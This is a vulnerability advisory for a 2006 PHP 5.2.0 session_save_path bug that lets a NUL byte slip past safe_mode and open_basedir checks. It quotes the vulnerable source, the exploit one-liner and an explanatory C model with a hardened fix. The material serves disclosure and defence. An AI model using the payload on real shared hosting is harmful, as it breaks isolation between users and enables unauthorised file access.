PHP session_save_path() Function safe_mode and open_basedir Security Restriction Bypass Vulnerability

Vulnerability ID: 1111728    Vulnerability type: Input validation
Published: 2006-12-08    Updated: 2007-03-15
CVE ID: CVE-2006-6383    CNNVD ID: CNNVD-200612-211
Platform: PHP    CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/29239
https://www.securityfocus.com/bid/21508
https://cxsecurity.com/issue/WLB-2006120071
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-211
|Vulnerability details
PHP is a widely used general-purpose scripting language that is especially suited to web development and can be embedded in HTML. PHP's implementation of the session-handling functions contains a flaw that a remote attacker could exploit to read sensitive information or to write files to unauthorized locations.

The session_save_path() function sets the session.save_path ini entry (the same value can also be set through ini_set()). session.save_path must hold the directory in which session tmp files are stored, but its syntax may be either [/PATH] or [N;/PATH], where N may be a string, for example:

1. session_save_path("/DIR/WHERE/YOU/HAVE/ACCESS")
2. session_save_path("5;/DIR/WHERE/YOU/HAVE/ACCESS")
3. session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")

Code from PHP 5.2.0 ext/session/session.c, lines 1477-1493:

--1477-1493---
PHP_FUNCTION(session_save_path)
{
	zval **p_name;
	int ac = ZEND_NUM_ARGS();
	char *old;

	if (ac < 0 || ac > 1 || zend_get_parameters_ex(ac, &p_name) == FAILURE)
		WRONG_PARAM_COUNT;

	old = estrdup(PS(save_path));

	if (ac == 1) {
		convert_to_string_ex(p_name);
		zend_alter_ini_entry("session.save_path", sizeof("session.save_path"), Z_STRVAL_PP(p_name), Z_STRLEN_PP(p_name), PHP_INI_USER, PHP_INI_STAGE_RUNTIME);
	}
	RETVAL_STRING(old, 0);
}
--1477-1493---

The value is stored in the ini hash in memory, but before that happens the safe_mode and open_basedir checks are applied to it. If the user then starts a session (e.g. with session_start()), PS_OPEN_FUNC(files) reads the session.save_path value. The two sides disagree about what that value is: the ini check scans the full length of the string and validates the path after the last ';', whereas the files handler treats the value as a C string and stops at the embedded NUL byte, so the accessible path passes the check while the session files are actually written under the first, inaccessible path. PHP 5.2.0 ext/s
|Vulnerability EXP
source: http://www.securityfocus.com/bid/21508/info

PHP is prone to a 'safe_mode' and 'open_basedir' restriction-bypass vulnerability. Successful exploits could allow an attacker to access sensitive information or to write files in unauthorized locations.

This vulnerability would be an issue in shared-hosting configurations where multiple users can create and execute arbitrary PHP script code; in such cases, the 'safe_mode' and 'open_basedir' restrictions are expected to isolate users from each other.

PHP version 5.2.0 is vulnerable to this issue.

session_save_path("/DIR/WHERE/YOU/DONT/HAVE/ACCESS\0;/DIR/WHERE/YOU/HAVE/ACCESS")
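The one-liner above works because the open_basedir check and the files save handler parse the same session.save_path value differently. The following is an added example, not PHP's own code: a stand-alone C model of the two parsers (`checked_path_52` mimics the length-based backward scan the 5.2.0 ini handler performs, `used_path` mimics the C-string parse of the files handler), a toy allow-list standing in for open_basedir, and a hardened check that rejects any embedded NUL before looking at the path, which is how later PHP releases close this gap. Function names, the constructed value `/etc\0;/home/user`, the basedir `/home/user` and the buffer size are assumptions made for the example.

```c
#include <stdio.h>
#include <string.h>

#define PATH_BUF 256   /* assumed buffer size for the example */

/* Backward scan over a length-delimited buffer, ignoring embedded NULs
 * (the behaviour of zend_memrchr() that the 5.2.0 ini handler relied on). */
static const char *memrchr_len(const char *s, int c, size_t n)
{
    while (n--) {
        if (s[n] == (char)c)
            return s + n;
    }
    return NULL;
}

/* Model of the 5.2.0 ini-handler check: uses the full length of the value,
 * so it finds the ';' that sits after an embedded NUL and validates only
 * the path that follows it. */
void checked_path_52(const char *value, size_t len, char *out, size_t outlen)
{
    const char *p = memrchr_len(value, ';', len);
    size_t n;
    if (p) { p++; n = len - (size_t)(p - value); }
    else   { p = value; n = len; }
    if (n >= outlen) n = outlen - 1;
    memcpy(out, p, n);
    out[n] = '\0';
}

/* Model of the files save handler (PS_OPEN_FUNC(files)): the value is a
 * C string, so an embedded NUL terminates it before the ';' is ever seen. */
void used_path(const char *value, char *out, size_t outlen)
{
    const char *p = strchr(value, ';');   /* "N;/path" syntax */
    p = p ? p + 1 : value;
    snprintf(out, outlen, "%s", p);
}

/* Toy allow-list check standing in for open_basedir (prefix match on a
 * directory boundary). */
int within_basedir(const char *path, const char *basedir)
{
    size_t n = strlen(basedir);
    return strncmp(path, basedir, n) == 0 && (path[n] == '/' || path[n] == '\0');
}

/* 1 if the value passes the 5.2.0 check yet makes the files handler write
 * outside basedir, i.e. the bypass succeeds; 0 otherwise. */
int bypass_succeeds(const char *value, size_t len, const char *basedir)
{
    char checked[PATH_BUF], used[PATH_BUF];
    checked_path_52(value, len, checked, sizeof(checked));
    used_path(value, used, sizeof(used));
    return within_basedir(checked, basedir) && !within_basedir(used, basedir);
}

/* Hardened check: reject any embedded NUL before parsing, so both sides
 * necessarily see the same string. Returns 1 = accept, 0 = reject. */
int check_hardened(const char *value, size_t len, const char *basedir)
{
    char checked[PATH_BUF];
    if (memchr(value, '\0', len) != NULL)
        return 0;
    checked_path_52(value, len, checked, sizeof(checked));
    return within_basedir(checked, basedir);
}

int main(void)
{
    /* Constructed input in the shape of the advisory's one-liner:
     * inaccessible path, embedded NUL, ';', accessible path. */
    static const char crafted[] = "/etc\0;/home/user";
    size_t len = sizeof(crafted) - 1;   /* 16 bytes, NUL included */
    char checked[PATH_BUF], used[PATH_BUF];

    checked_path_52(crafted, len, checked, sizeof(checked));
    used_path(crafted, used, sizeof(used));
    printf("5.2.0 check validates: %s\n", checked);   /* /home/user */
    printf("files handler uses:    %s\n", used);      /* /etc */
    printf("bypass succeeds:       %d\n", bypass_succeeds(crafted, len, "/home/user"));
    printf("hardened accepts:      %d\n", check_hardened(crafted, len, "/home/user"));
    return 0;
}
```

The benign "5;/home/user" form is accepted by both checks and parsed identically by both sides; only a value carrying a NUL makes the length-based and C-string views diverge, which is why rejecting embedded NULs (rather than tightening the path comparison) is the right fix.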
|Affected products
SuSE SUSE Linux Enterprise Server 8 + Linux kernel 2.4.21 + Linux kernel 2.4.19 SuSE SUSE Linux Enterprise Server 10 SuSE S
|References

Source: BID
Name: 21508
Link: http://www.securityfocus.com/bid/21508
Source: BUGTRAQ
Name: 20061208 PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
Link: http://www.securityfocus.com/archive/1/archive/1/453938/30/9270/threaded
Source: SREASONRES
Name: 20061208 PHP 5.2.0 session.save_path safe_mode and open_basedir bypass
Link: http://securityreason.com/achievement_securityalert/43
Source: cvs.php.net
Link: http://cvs.php.net/viewcvs.cgi/php-src/ext/session/session.c?r1=1.336.2.53.2.7&r2=1.336.2.53.2.8
Source: OPENPKG
Name: OpenPKG-SA-2007.010
Link: http://www.openpkg.com/security/advisories/OpenPKG-SA-2007.010.html
Source: MANDRIVA
Name: MDKSA-2007:038
Link: http://www.mandriva.com/security/advisories?name=MDKSA-2007:038
Source: SREASON
Name: 2000
Link: http://securityreason.com/securityalert/2000
Source: SECUNIA
Name: 24514
Link: http://secunia.com/advisories/24514
Source: SECUNIA
Name: 24022
Link: http://secunia.com/advisories/24022
Source: SUSE
Name: SUSE-SA:2007:020
Link: http://lists.suse.com/archive/suse-security-announce/2007-Mar/0003.html